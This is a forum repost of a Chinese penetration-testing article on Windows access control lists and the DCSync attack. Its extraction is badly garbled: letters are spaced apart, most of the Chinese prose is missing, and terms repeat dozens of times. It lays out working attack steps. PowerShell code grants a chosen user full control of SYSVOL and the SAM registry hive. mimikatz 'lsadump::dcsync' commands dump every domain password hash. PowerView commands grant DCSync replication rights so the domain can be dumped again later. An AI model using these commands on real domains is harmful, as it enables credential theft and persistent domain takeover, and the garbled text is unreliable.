[7026] 2020-11-01_关于windows下的ACL与dcsync

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-17
2020-11-01_关于windows下的ACL与dcsync w i n d o w s A C L d c s y n c E   2 0 2 0 - 1 1 - 0 1   Y a n g s i r 使 N o . 1 N o . 1 A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L w i n d o w s A C L ( A c c e s s   C o n t r o l   L i s t ) A C L A D A C L A c c e s s   C o n t r o l   L i s t D A C L S A C L A C E A c c e s s   C o n t r o l   E n t r y A C L D A C L D i s c r e t i o n a r y   A c c e s s   C o n t r o l   L i s t S A C L S y s t e m   A c c e s s   C o n t r o l   L i s t 访 访 访 D A C L 访 D A C L A C E 访 A C E D A C L A C E A C E A C E C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g D A C L   .
D A C L A C E N o . 2 N o . 2 A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L A C L i c a c l s A C L A C L ( O I )   ( C I )   ( F ) 访 i c a c l s   C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g
A C L i c a c l s   C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g   / s a v e   A c l b a c k   / t A C L i c a c l s   C : W i n d o w s S Y S V O L s y s v o l     / r e s t o r e   A c l b a c k     / t 访 i c a c l s   C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g   / g r a n t   j a c k : ( O I ) ( C I ) ( F )   / t
( ) 访 i c a c l s   C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g   / r e m o v e   j a c k   / t p o w e r s h e l l A C L A C L G e t - A c l   - P a t h   ' C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g ' |   F o r m a t - T a b l e   - w r a p
访 A C L A C L G e t - A c l   - P a t h   ' H K L M : S A M ' |   F o r m a t - T a b l e   - w r a p 访 f u n c t i o n   A d d - A C L {         [ C m d l e t B i n d i n g ( ) ]                               P a r a m   (                 [ P a r a m e t e r ( M a n d a t o r y   =   $ T r u e ) ]                 [ S t r i n g ]                 [ V a l i d a t e N o t N u l l O r E m p t y ( ) ]                 $ P a t h         )           $ a c l   =   G e t - A c l   - P a t h   $ P a t h         $ p e r s o n   =   [ S y s t e m . S e c u r i t y . P r i n c i p a l . N T A c c o u n t ] " j a c k "           $ a c c e s s   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . F i l e S y s t e m R i g h t s ] " F u l l C o n t r o l "         $ i n h e r i t a n c e   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . I n h e r i t a n c e F l a g s ] " O b j e c t I n h e r i t , C o n t a i n e r I n h e r i t "         $ p r o p a g a t i o n   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . P r o p a g a t i o n F l a g s ] " N o n e "         $ t y p e   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . A c c e s s C o n t r o l T y p e ] " A l l o w "         $ r u l e   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . F i l e S y s t e m A c c e s s R u l e (   `         $ p e r s o n , $ a c c e s s , $ i n h e r i t a n c e , $ p r o p a g a t i o n , $ t y p e )         $ a c l . A d d A c c e s s R u l e ( $ r u l e )         S e t - A c l   $ P a t h   $ a c l } A d d - A C L   - P a t h   ' C : W i n d o w s S Y S V O L s y s v o l 0 d a y . o r g '
A c c e s s $ a c l   =   G e t - A c l   - P a t h   ' H K L M : S A M ' $ a c l . A c c e s s H K L M : S A M A C L A d m i n i s t r a t o r H K L M : S A M S A M A C L S y s t e m 访 $ a c l   =   G e t - A c l   H K L M : S A M $ p e r s o n   =   [ S y s t e m . S e c u r i t y . P r i n c i p a l . N T A c c o u n t ] " j a c k " $ a c c e s s   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . R e g i s t r y R i g h t s ] " F u l l C o n t r o l " $ i n h e r i t a n c e   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . I n h e r i t a n c e F l a g s ] " O b j e c t I n h e r i t , C o n t a i n e r I n h e r i t " $ p r o p a g a t i o n   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . P r o p a g a t i o n F l a g s ] " N o n e " $ t y p e   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . A c c e s s C o n t r o l T y p e ] " A l l o w " $ r u l e   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . R e g i s t r y A c c e s s R u l e (   ` $ p e r s o n , $ a c c e s s , $ i n h e r i t a n c e , $ p r o p a g a t i o n , $ t y p e ) $ a c l . A d d A c c e s s R u l e ( $ r u l e ) S e t - A c l   H K L M : S A M   $ a c l
N o . 3 N o . 3 d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c d c s y n c m i m i k a t z h a s h 使 h a s h 使 d c s y n c 使 d c s y n c h a s h D R S ( D i r e c t o r y   R e p l i c a t i o n   S e r v i c e ) I D L _ D R S G e t N C C h a n g e s A d m i n i s t r a t o r s D o m a i n   A d m i n s E n t e r p r i s e   A d m i n s h a s h m i m i k a t z . e x e   " l s a d u m p : : d c s y n c   / d o m a i n : 0 d a y . o r g   / a l l   / c s v "   e x i t a d m i n i s i t r a t o r h a s h m i m i k a t z . e x e   " l s a d u m p : : d c s y n c   / d o m a i n : 0 d a y . o r g   / u s e r : a d m i n i s t r a t o r   / c s v "   e x i t 访 $ a c l   =   G e t - A c l   H K L M : S A M $ p e r s o n   =   [ S y s t e m . S e c u r i t y . P r i n c i p a l . N T A c c o u n t ] " j a c k " $ a c c e s s   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . R e g i s t r y R i g h t s ] " F u l l C o n t r o l " $ i n h e r i t a n c e   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . I n h e r i t a n c e F l a g s ] " O b j e c t I n h e r i t , C o n t a i n e r I n h e r i t " $ p r o p a g a t i o n   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . P r o p a g a t i o n F l a g s ] " N o n e " $ t y p e   =   [ S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . A c c e s s C o n t r o l T y p e ] " A l l o w " $ r u l e   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . A c c e s s C o n t r o l . R e g i s t r y A c c e s s R u l e (   ` $ p e r s o n , $ a c c e s s , $ i n h e r i t a n c e , $ p r o p a g a t i o n , $ t y p e ) $ a c l . R e m o v e A c c e s s R u l e ( $ r u l e ) S e t - A c l   H K L M : S A M   $ a c l
使 r u n a s s q l a d m i n d c s y n c r u n a s   / n o p r o f i l e   / u s e r : s q l a d m i n @ 0 d a y . o r g   c m d h a s h m i m i k a t z . e x e   p r i v i l e g e : : d e b u g   " l s a d u m p : : d c s y n c   / d o m a i n : 0 d a y . o r g     / a l l   / c s v "   e x i t
r u n a s   / n o p r o f i l e   / u s e r : s q l a d m i n @ 0 d a y . o r g   c : t e s t 1 . b a t b a t N o . 4 N o . 4 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 使 D o m a i n   A d m i n s E n t e r p r i s e   A d m i n s A C E ( A c c e s s   C o n t r o l   E n t r i e s ) D S - R e p l i c a t i o n - G e t - C h a n g e s ( G U I D : 1 1 3 1 f 6 a a - 9 c 0 7 - 1 1 d 1 - f 7 9 f - 0 0 c 0 4 f c 2 d c d 2 ) D S - R e p l i c a t i o n - G e t - C h a n g e s - A l l ( G U I D : 1 1 3 1 f 6 a d - 9 c 0 7 - 1 1 d 1 - f 7 9 f - 0 0 c 0 4 f c 2 d c d 2 ) D S - R e p l i c a t i o n - G e t - C h a n g e s ( G U I D : 8 9 e 9 5 b 7 6 - 4 4 4 d - 4 c 6 2 - 9 9 1 a - 0 f a c b e d a 6 4 0 c ) 使 h a s h j a c k h a s h : m i m i k a t z . e x e   p r i v i l e g e : : d e b u g   " l s a d u m p : : d c s y n c   / d o m a i n : 0 d a y . o r g     / a l l   / c s v "   e x i t  
( g u i d ) 访 A d d - D o m a i n O b j e c t A c l   - T a r g e t I d e n t i t y   ' 1 1 3 1 f 6 a a - 9 c 0 7 - 1 1 d 1 - f 7 9 f - 0 0 c 0 4 f c 2 d c d 2 '   - P r i n c i p a l I d e n t i t y   j a c k   - R i g h t s   A l l ( g u i d ) 访 R e m o v e - D o m a i n O b j e c t A c l   - T a r g e t I d e n t i t y   ' 1 1 3 1 f 6 a a - 9 c 0 7 - 1 1 d 1 - f 7 9 f - 0 0 c 0 4 f c 2 d c d 2 '   - P r i n c i p a l I d e n t i t y   j a c k   - R i g h t s   A l l p o w e r v i e w h t t p s : / / g i t h u b . c o m / P o w e r S h e l l M a f i a / P o w e r S p l o i t / b l o b / d e v / R e c o n / P o w e r V i e w . p s 1 A C E : A d d - D o m a i n O b j e c t A c l   - T a r g e t I d e n t i t y   " D C = 0 d a y , D C = o r g "   - P r i n c i p a l I d e n t i t y   j a c k   - R i g h t s   D C S y n c   h a s h j a c k
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则